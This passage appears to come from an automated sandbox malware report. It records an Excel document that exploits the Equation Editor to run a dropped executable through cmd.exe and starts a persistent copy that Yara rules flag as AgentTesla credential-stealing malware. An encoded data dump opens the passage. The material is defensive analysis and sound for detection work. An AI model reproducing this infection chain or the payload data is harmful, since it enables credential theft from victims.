36 64 37 39 33 31 30 30 33 39 33 66 32 38 37 30 31 31 35 33 31 66 33 64 31 62 36 35 32 61 35 36 35 35 37 39 35 37 33 61 33 30 33 34 33 30 34 31 34 66 37 66 35 33 32 63 33 62 32 30 33 66 35 65 37 38 37 62 35 61 37 34 37 64 37 38 37 39 31 31 31 65 37 64 35 36 30 35 30 35 36 61 36 39 31 37 31 35 36 35 35 32 37 64 37 33 30 61 31 33 36 38 36 38 37 33 35 63 31 39 37 38 31 65 31 64 30 32 37 34 31 36 35 30 37 64 37 30 30 39 36 64 31 32 31 36 30 30 34 64 37 63 37 39 30 66 36 34 36 37 36 37 31 39 35 62 37 32 37 38 31 66 36 62 31 62 31 34 37 33 32 31 30 32 30 35 30 63 36 31 37 36 31 34 36 31 32 37 36 32 31 31 36 32 36 39 31 37 31 36 37 36 35 38 37 32 37 36 37 30 37 64 31 64 31 39 37 38 35 62 30 66 30 63 36 64 36 65 31 39 31 38 36 37 35 34 37 36 37 62 30 65 31 66 36 66 36 64 37 65 35 36 31 30 37 66 31 39 31 33 30 66 37 36 31 30 35 62 37 35 37 34 30 35 36 61 31 37 31 62 30 61 34 34 37 62 37 65 30 31 36 39 36 35 36 31 31 32 35 33 37 36 37 34 31 38 36 65 31 36 31 65 37 61 32 36 30 35 30 62 30 31 36 33 37 30 31 66 36 39 32 33 36 65 31 36 36 37 36 34 31 64 31 66 37 31 35 66 37 63 37 62 37 32 37 62 31 36 31 31 37 63 35 37 30 38 30 39 36 30 36 34 31 30 31 66 36 30 35 61 37 62 37 39 30 38 31 34 36 37 36 39 37 32 35 31 31 35 37 32 31 33 31 61 30 38 37 31 31 65 35 36 37 37 37 33 32 39 32 30 34 66 37 30 37 39 35 31 37 36 37 33 37 65 37 32 31 39 31 36 37 34 35 34 30 39 30 38 36 64 36 34 31 66 31 37 36 65 35 30 37 33 37 35 30 31 31 62 36 30 36 31 37 31 35 30 31 34 37 66 31 33 31 35 30 30 37 66 31 34 35 65 37 62 37 62 37 30 37 36 30 64 30 33 37 38 35 30 37 62 37 33 37 31 37 61 31 37 31 63 37 63 35 38 30 30 30 37 36 61 36 63 31 63 31 36 36 66 35 64 37 33 37 61 30 39 31 35 36 61 36 39 37 64 35 39 31 62 37 38 31 62 31 36 30 31 37 65 31 39 35 65 37 34 37 65 30 65 35 31 37 61 62 31 34 62 61 39 65 35 30 61 39 36 66 65 39 34 39 36 39 32 37 38 64 61 33 36 39 39
                                                                      Data Ascii: 70908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706d793100393f287011531f3d1b652a565579573a303430414f7f532c3b203f5e787b5a747d7879111e7d5605056a69171565527d730a136868735c19781e1d027416507d70096d1216004d7c790f646767195b72781f6b1b14732102050c617614612762116269171676587276707d1d19785b0f0c6d6e19186754767b0e1f6f6d7e56107f19130f76105b7574056a171b0a447b7e0169656112537674186e161e7a26050b0163701f69236e1667641d1f715f7c7b727b16117c5708096064101f605a7b790814676972511572131a08711e56777329204f70795176737e721916745409086d641f176e507375011b60617150147f1315007f145e7b7b70760d0378507b73717a171c7c5800076a6c1c166f5d737a09156a697d591b781b16017e195e747e0e517ab14ba9e50a96fe94969278da3699


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: EXCEL.EXE PID: 2276 Parent PID: 584

                                                                      General

                                                                      Start time:08:26:40
                                                                      Start date:27/11/2020
                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                      Imagebase:0x13f180000
                                                                      File size:27641504 bytes
                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: EQNEDT32.EXE PID: 2396 Parent PID: 584

                                                                      General

                                                                      Start time:08:26:58
                                                                      Start date:27/11/2020
                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                      Imagebase:0x400000
                                                                      File size:543304 bytes
                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: cmd.exe PID: 2948 Parent PID: 2396

                                                                      General

                                                                      Start time:08:27:07
                                                                      Start date:27/11/2020
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe
                                                                      Imagebase:0x4a540000
                                                                      File size:302592 bytes
                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Analysis Process: name.exe PID: 912 Parent PID: 2948

                                                                      General

                                                                      Start time:08:27:08
                                                                      Start date:27/11/2020
                                                                      Path:C:\Users\Public\name.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\Public\name.exe
                                                                      Imagebase:0x400000
                                                                      File size:1218752 bytes
                                                                      MD5 hash:45E25807FC1BD31A0B8309C44AFCE6E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low

                                                                      Analysis Process: name.exe PID: 1616 Parent PID: 912

                                                                      General

                                                                      Start time:08:27:40
                                                                      Start date:27/11/2020
                                                                      Path:C:\Users\Public\name.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\Public\name.exe
                                                                      Imagebase:0x400000
                                                                      File size:1218752 bytes
                                                                      MD5 hash:45E25807FC1BD31A0B8309C44AFCE6E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2352654865.0000000001EE2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2352856247.0000000002140000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2352963258.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2354001963.00000000033D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000003.2215598384.0000000000338000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2354068274.0000000003426000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Analysis Process: Hqfadrv.exe PID: 3068 Parent PID: 1388

                                                                      General

                                                                      Start time:08:27:50
                                                                      Start date:27/11/2020
                                                                      Path:C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe'
                                                                      Imagebase:0x400000
                                                                      File size:1218752 bytes
                                                                      MD5 hash:45E25807FC1BD31A0B8309C44AFCE6E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low

                                                                      Analysis Process: Hqfadrv.exe PID: 1684 Parent PID: 1388

                                                                      General

                                                                      Start time:08:27:58
                                                                      Start date:27/11/2020
                                                                      Path:C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe'
                                                                      Imagebase:0x400000
                                                                      File size:1218752 bytes
                                                                      MD5 hash:45E25807FC1BD31A0B8309C44AFCE6E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      Analysis Process: Hqfadrv.exe PID: 2732 Parent PID: 3068

                                                                      General

                                                                      Start time:08:28:38
                                                                      Start date:27/11/2020
                                                                      Path:C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                                                                      Imagebase:0x400000
                                                                      File size:1218752 bytes
                                                                      MD5 hash:45E25807FC1BD31A0B8309C44AFCE6E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2352775112.0000000002060000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2354037538.0000000003406000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2351863459.0000000000450000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2353901074.00000000033B4000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2352604798.0000000001EB2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000003.2339765119.00000000005F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >